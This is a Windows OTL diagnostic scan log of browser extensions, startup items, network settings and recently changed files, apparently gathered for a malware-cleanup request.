FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{203FB6B2-2E1E-4474-863B-4C483ECCE78E}: C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_1.2.0.6\coFFNST\ [2011/08/02 11:25:28 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013/03/04 17:15:27 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/02/02 21:11:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/01/14 23:59:14 | 000,000,000 | ---D | M]
 
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions\{3550f703-e582-4d05-9a08-453d09bdfdc6}
[2014/05/19 22:34:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions
[2010/08/07 16:01:40 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2012/02/23 22:12:56 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2012/06/19 10:53:37 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2007/12/15 02:49:00 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Program Files\Mozilla Firefox\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2013/03/04 17:15:27 | 000,000,000 | ---D | M] (No name found) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2011/03/18 13:53:24 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/06/28 11:42:00 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\mozilla firefox\plugins\npwachk.dll
[2010/01/01 04:00:00 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage: http://www.google.com
CHR - plugin: First user (Enabled) = c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - plugin: Error reading preferences file
CHR - Extension: Google Wallet = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: DivX Plus Web Player HTML5 <video> = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.172_0\
 
O1 HOSTS File: ([2014/05/19 20:35:59 | 000,431,917 | ---- | M]) - C:\Windows\System32\drivers\etc\HOSTS
O1 - Hosts: 127.0.0.1  localhost
O1 - Hosts: ::1  localhost    #[IPv6]
O1 - Hosts: 13627 more lines...
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (no name) - {30CEEEA2-3742-40e4-85DD-812BF1CBB83D} - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [CTHelper] C:\Windows\System32\CtHelper.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [DivXMediaServer] C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe (DivX, LLC)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation)
O4 - HKCU..\Run: [HostsMan] C:\Program Files\HostsMan\hm.exe (abelhadigital.com)
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
O4 - Startup: C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O13 - gopher Prefix: missing
O16 - DPF: {05317530-B882-449D-9421-18D94FA3ED34} http://www.sis.com/ocis/OSInfo.cab (OSInfo Control)
O16 - DPF: {16095503-786F-4097-AED6-5D567A26D760} http://www.sis.com/o...utodetectNT.cab (SiS_OCX Control)
O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} http://www.adobe.com...obat/nos/gp.cab (get_atlcom Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creat...13/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creat...015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creat...21022/CTPID.cab (Creative Software AutoUpdate Support Package)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{78665C2D-46DF-4788-BFC2-B06EFD46D2C3}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9AF3476A-ABC9-4638-B175-8F534F2EE741}: DhcpNameServer = 192.168.9.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BBBE3A5C-8D11-413B-B0EC-06F6820506B2}: DhcpNameServer = 208.67.222.222
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: NameServer = 208.67.222.222,208.67.220.220
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: D:\My Documents\bettiedesk.bmp
O24 - Desktop BackupWallPaper: D:\My Documents\bettiedesk.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/09/18 17:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2000/12/18 09:44:14 | 000,000,081 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
NetSvcs: FastUserSwitchingCompatibility -  File not found
NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)
NetSvcs: Nla -  File not found
NetSvcs: Ntmssvc -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: SRService -  File not found
NetSvcs: WmdmPmSp -  File not found
NetSvcs: LogonHours -  File not found
NetSvcs: PCAudit -  File not found
NetSvcs: helpsvc -  File not found
NetSvcs: uploadmgr -  File not found
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/05/20 14:02:25 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/05/20 13:54:04 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/05/20 13:16:11 | 000,536,576 | ---- | C] (SQLite Development Team) -- C:\Windows\System32\sqlite3.dll
[2014/05/20 13:14:02 | 001,016,261 | ---- | C] (Thisisu) -- C:\Users\Ken\Desktop\JRT.exe
[2014/05/20 08:34:41 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:07:25 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Oracle
[2014/05/19 22:07:05 | 000,000,000 | ---D | C] -- C:\Windows\Sun
[2014/05/19 22:06:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/05/19 22:05:35 | 000,264,616 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\javaws.exe
[2014/05/19 22:05:24 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\javaw.exe
[2014/05/19 22:05:24 | 000,175,016 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\java.exe
[2014/05/19 22:05:24 | 000,094,632 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\WindowsAccessBridge.dll
[2014/05/19 22:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/05/19 20:16:10 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/05/19 12:37:29 | 000,000,000 | ---D | C] -- C:\aa8e0b99a77696e8ab0e55
[2014/05/19 12:09:02 | 000,000,000 | ---D | C] -- C:\Windows\Migration
[2014/05/19 12:02:31 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/05/19 11:52:08 | 000,000,000 | ---D | C] -- C:\Windows\System32\MRT
[2014/05/19 11:50:15 | 000,176,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll
[2014/05/19 11:50:14 | 000,065,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll
[2014/05/19 11:50:13 | 000,607,744 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll
[2014/05/19 11:50:13 | 000,142,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014/05/19 11:50:11 | 001,806,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll
[2014/05/19 11:50:11 | 000,231,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\url.dll
[2014/05/19 11:50:09 | 001,427,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl
[2014/05/19 11:34:56 | 002,382,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[2014/05/19 11:14:31 | 000,025,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\hidparse.sys
[2014/05/19 11:14:18 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cryptdlg.dll
[2014/05/19 11:14:03 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cscript.exe
[2014/05/19 11:14:03 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wshcon.dll
[2014/05/19 11:13:59 | 000,812,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\certutil.exe
[2014/05/19 11:13:58 | 000,041,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\certenc.dll
[2014/05/19 11:12:19 | 001,172,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10warp.dll
[2014/05/19 11:12:19 | 000,486,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10level9.dll
[2014/05/19 11:12:19 | 000,219,648 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10_1core.dll
[2014/05/19 11:12:18 | 001,029,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10.dll
[2014/05/19 11:12:18 | 000,683,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d2d1.dll
[2014/05/19 11:12:18 | 000,189,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10core.dll
[2014/05/19 11:12:18 | 000,160,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10_1.dll
[2014/05/19 11:12:17 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\DWrite.dll
[2014/05/19 11:12:15 | 003,603,904 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ntkrnlpa.exe
[2014/05/19 11:12:14 | 003,551,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ntoskrnl.exe
[2014/05/19 11:11:55 | 001,548,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WMVDECOD.DLL
[2014/05/19 11:11:53 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cdd.dll
[2014/05/19 11:11:52 | 000,293,376 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\System32\atmfd.dll
[2014/05/19 11:11:51 | 000,034,304 | ---- | C] (Adobe Systems) -- C:\Windows\System32\atmlib.dll
[2014/05/19 11:11:50 | 000,596,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL
[2014/05/19 11:11:48 | 002,050,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\win32k.sys
[2014/05/19 11:11:45 | 000,226,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\usbport.sys
[2014/05/19 11:11:45 | 000,006,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\usbd.sys
[2014/05/19 11:11:39 | 000,102,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
[2014/05/19 11:11:34 | 001,304,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WMALFXGFXDSP.dll
[2014/05/19 11:11:34 | 000,335,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SysFxUI.dll
[2014/05/19 11:11:34 | 000,167,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\portcls.sys
[2014/05/19 11:11:34 | 000,130,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\drmk.sys
[2014/05/19 11:11:25 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\printcom.dll
[2014/05/19 11:11:24 | 000,505,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\qedit.dll
[2014/05/19 10:59:12 | 000,876,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wer.dll
[2014/05/19 10:59:05 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\tzres.dll
[2014/05/19 10:45:52 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2014/05/19 10:36:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TRENDnet
[2014/05/19 10:36:52 | 000,430,080 | ---- | C] (Realtek) -- C:\Windows\SwUSB.exe
[2014/05/19 10:36:52 | 000,025,896 | ---- | C] (Windows ® Codename Longhorn DDK provider) -- C:\Windows\System32\drivers\RtlProt.sys
[2014/05/19 10:36:49 | 001,957,448 | ---- | C] (Realtek Semiconductor Corporation                           ) -- C:\Windows\System32\drivers\RTWlanU.sys
[2014/05/19 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files\TRENDnet
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/05/20 14:05:26 | 000,642,740 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2014/05/20 14:05:26 | 000,119,932 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2014/05/20 13:59:53 | 000,000,882 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/20 13:59:06 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 13:59:06 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 13:58:52 | 000,067,584 | ---- | M] () -- C:\Windows\bootstat.dat
[2014/05/20 13:58:48 | 3220,758,528 | -HS- | M] () -- C:\hiberfil.sys
[2014/05/20 13:57:49 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXStateBkp-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,011,564 | ---- | M] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:00 | 000,000,886 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/20 13:53:00 | 001,326,389 | ---- | M] () -- C:\Users\Ken\Desktop\AdwCleaner.exe
[2014/05/20 13:14:26 | 001,016,261 | ---- | M] (Thisisu) -- C:\Users\Ken\Desktop\JRT.exe
[2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:56:51 | 000,000,266 | ---- | M] () -- C:\Windows\tasks\AutoKMS.job
[2014/05/19 22:12:12 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerApp.exe
[2014/05/19 22:12:12 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerCPLApp.cpl
[2014/05/19 22:05:13 | 000,094,632 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\WindowsAccessBridge.dll
[2014/05/19 22:05:11 | 000,264,616 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\javaws.exe
[2014/05/19 22:05:11 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\javaw.exe
[2014/05/19 22:05:10 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\java.exe
[2014/05/19 21:18:40 | 000,000,275 | ---- | M] () -- C:\Windows\wininit.ini
[2014/05/19 20:35:59 | 000,431,917 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS
[2014/05/19 20:20:10 | 000,945,568 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS.bak
[2014/05/19 20:16:10 | 000,001,061 | ---- | M] () -- C:\Users\Ken\Desktop\Revo Uninstaller.lnk
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:43:20 | 000,381,216 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settings.sfm
[2014/05/19 12:39:10 | 000,445,016 | ---- | M] (Creative Labs) -- C:\Windows\System32\wrap_oal.dll
[2014/05/19 12:39:10 | 000,109,144 | ---- | M] (Portions © Creative Labs Inc. and NVIDIA Corp.) -- C:\Windows\System32\OpenAL32.dll
[2014/05/19 12:39:09 | 000,000,087 | RH-- | M] () -- C:\Windows\ctfile.rfc
[2014/05/19 12:06:34 | 000,002,057 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/19 11:20:19 | 000,001,975 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/19 10:46:11 | 000,000,953 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2014/05/19 10:45:36 | 000,000,917 | ---- | M] () -- C:\Users\Ken\Desktop\Dropbox.lnk
[2014/05/19 10:36:53 | 000,001,810 | ---- | M] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | M] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/05 19:14:12 | 002,382,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/05/20 13:53:38 | 001,326,389 | ---- | C] () -- C:\Users\Ken\Desktop\AdwCleaner.exe
[2014/05/19 21:18:39 | 000,000,275 | ---- | C] () -- C:\Windows\wininit.ini
[2014/05/19 12:45:34 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:45:31 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:40:12 | 000,029,820 | ---- | C] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,011,564 | ---- | C] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settings.sfm
